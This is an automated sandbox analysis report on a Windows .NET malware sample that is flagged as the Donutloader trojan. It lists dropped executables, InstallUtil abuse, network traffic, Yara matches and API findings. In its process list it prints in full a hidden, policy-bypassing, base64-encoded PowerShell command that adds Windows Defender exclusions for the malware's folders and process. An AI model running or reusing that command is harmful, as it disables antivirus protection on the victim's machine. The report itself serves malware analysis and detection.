Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 65277
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 65277 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:65277 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 11.2.txxbiwtbs.exe.4074c50.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 11.2.txxbiwtbs.exe.4024c30.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1821399208.0000000009650000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000B.00000002.1995844689.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000003.00000002.1869188121.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1824447213.000000000A088000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0610D708 0_2_0610D708
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0610FDA8 0_2_0610FDA8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06E0D280 0_2_06E0D280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06E0A590 0_2_06E0A590
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0711CD28 0_2_0711CD28
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0711B368 0_2_0711B368
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07B889D0 0_2_07B889D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07B94288 0_2_07B94288
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07B94278 0_2_07B94278
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_09E6D8A0 0_2_09E6D8A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_09E50040 0_2_09E50040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_09E50039 0_2_09E50039
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BB830E9 1_2_00007FFD9BB830E9
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_06D58948 3_2_06D58948
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_06D64288 3_2_06D64288
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_06D64278 3_2_06D64278
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_06D62B4F 3_2_06D62B4F
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07125618 3_2_07125618
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_0712DEAF 3_2_0712DEAF
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_071215B0 3_2_071215B0
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_0712CAE8 3_2_0712CAE8
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07125617 3_2_07125617
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_0712CAD9 3_2_0712CAD9
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07122918 3_2_07122918
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07122908 3_2_07122908
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_075FC628 3_2_075FC628
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_075FA458 3_2_075FA458
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_075FC619 3_2_075FC619
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07A7A590 3_2_07A7A590
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07A7D280 3_2_07A7D280
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07BE9F10 3_2_07BE9F10
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07BE4760 3_2_07BE4760
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07BED337 3_2_07BED337
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07BE5378 3_2_07BE5378
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07BEB6A0 3_2_07BEB6A0
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07BE4AA8 3_2_07BE4AA8
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_08DDD8A0 3_2_08DDD8A0
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_08DC0040 3_2_08DC0040
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_08DC000A 3_2_08DC000A
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07BE0006 3_2_07BE0006
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Code function: 3_2_07BE0040 3_2_07BE0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_07BCD708 4_2_07BCD708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08ADCAE8 4_2_08ADCAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD15B0 4_2_08AD15B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08ADDEAF 4_2_08ADDEAF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD2EE0 4_2_08AD2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD5059 4_2_08AD5059
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD2908 4_2_08AD2908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD390B 4_2_08AD390B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD2918 4_2_08AD2918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08ADCAD9 4_2_08ADCAD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD5618 4_2_08AD5618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD2FA2 4_2_08AD2FA2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD2FE4 4_2_08AD2FE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD2F2A 4_2_08AD2F2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD2EE0 4_2_08AD2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AD2F70 4_2_08AD2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08B0D8A0 4_2_08B0D8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AF0006 4_2_08AF0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_08AF0040 4_2_08AF0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A3BCB08 4_2_0A3BCB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A3BA538 4_2_0A3BA538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A3BCAF9 4_2_0A3BCAF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A819F10 4_2_0A819F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A81D337 4_2_0A81D337
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A815378 4_2_0A815378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A810040 4_2_0A810040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A814760 4_2_0A814760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A814AA8 4_2_0A814AA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A810007 4_2_0A810007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A81B6A0 4_2_0A81B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A9BCD28 4_2_0A9BCD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4_2_0A9BB368 4_2_0A9BB368
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_056BD508 11_2_056BD508
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_056BCC2E 11_2_056BCC2E
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_056BD4F9 11_2_056BD4F9
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_056BD698 11_2_056BD698
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_056F4C37 11_2_056F4C37
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_056F4418 11_2_056F4418
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_056F451D 11_2_056F451D
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_056F4408 11_2_056F4408
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_06525254 11_2_06525254
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_06522A5C 11_2_06522A5C
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_065208C0 11_2_065208C0
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_06521B78 11_2_06521B78
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_0652179C 11_2_0652179C
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_06521FA8 11_2_06521FA8
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_083CDDE0 11_2_083CDDE0
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_083B0037 11_2_083B0037
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_083B0040 11_2_083B0040
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Code function: 11_2_083CD240 11_2_083CD240
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000000.1709874025.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFbaprhuy.exe2 vs file.exe
Source: file.exe, 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameAblswvgh.dll" vs file.exe
Source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFbedztzxbbe.dll" vs file.exe
Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000002.1761959990.000000000123E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs file.exe
Source: file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFbedztzxbbe.dll" vs file.exe
Source: file.exe, 00000000.00000002.1763526633.000000000368B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenametaskschd.dll.muij% vs file.exe
Source: file.exe, 00000000.00000002.1763526633.000000000368B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $fq,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameFbaprhuy.exe2 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 11.2.txxbiwtbs.exe.4074c50.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 11.2.txxbiwtbs.exe.4024c30.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1821399208.0000000009650000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000B.00000002.1995844689.0000000002C74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.1869188121.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1824447213.000000000A088000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.459c2e8.6.raw.unpack, OVAC5LcmtgojpkhnNKb.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.6f80000.15.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.file.exe.6f80000.15.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.file.exe.6f80000.15.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.6f80000.15.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.file.exe.6f80000.15.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/15@2/2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06E078D4 AdjustTokenPrivileges, 0_2_06E078D4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\RegisteredChannels Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7756:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: \Sessions\1\BaseNamedObjects\210888
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xiv0j5rn.pb1.ps1 Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 13%
Source: file.exe Virustotal: Detection: 39%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
